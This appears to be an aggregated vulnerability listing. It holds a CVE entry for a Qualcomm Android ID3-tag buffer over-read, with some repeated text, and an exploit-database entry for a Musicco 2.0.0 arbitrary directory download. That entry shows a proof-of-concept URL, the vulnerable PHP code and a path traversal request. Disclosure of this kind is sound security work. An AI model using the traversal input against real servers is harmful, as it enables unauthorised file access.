CVE-2018-3594: In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Automobile, Snapdragon Mobile, and Snapdragon Wear MDM9206, MDM9607, MDM9650, SD…

CVE-2018-3594 [CRITICAL] CVE-2018-3594: Closed-source component Android Security Bulletin 2018-04-01 CVE: CVE-2018-3594 Severity: HIGH Type: N/A Component: Closed-source component References: A-71501112*

CVE-2018-3594 [CRITICAL] CWE-125 GHSA-wjrm-3qfx-g6wg: In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Automobile, Snapdragon Mobile, and Snapdragon Wear MDM9206, MDM9607, MDM9650, In Android before security patch level 2018-04-05 on Qualcomm Snapdragon Automobile, Snapdragon Mobile, and Snapdragon Wear MDM9206, MDM9607, MDM9650, SD 210/SD 212/SD 205, SD 425, SD 430, SD 450, SD 615/16/SD 415, SD 617, SD 625, SD 650/52, SD 808, SD 820, SD 820A, SD 835, SD 845, while parsing a private frame in an ID3 tag, a buffer over-read can occur when comparing frame data with predefined owner identifier strings.

Musicco 2.0.0 - Arbitrary Directory Download Musicco 2.0.0 - Arbitrary Directory Download --- # Exploit Title: Musicco 2.0.0 - Arbitrary Directory Download # Dork: N/A # Date: 2018-11-09 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.musicco.app/ # Software Link: https://codeload.github.com/micser/musicco/zip/master # Version: 2.0.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/?getAlbum&parent=[Directory]&album=Efe # /[PATH]/index.php #3592 } elseif (isset($_GET['getAlbum'])) { #3593 $parent = $_GET['parent']; #3594 $album = $_GET['album']; #3595 $rootPath = realpath($parent); #3596 $zip = new ZipArchive(); #3597 $zip->open('./'.Musicco::getConfig('tempFolder').'/'.$album.'.zip', ZipArchive::CREATE | ZipArchive::OVERWRITE); GET /[PATH]/?getAlbum&parent=..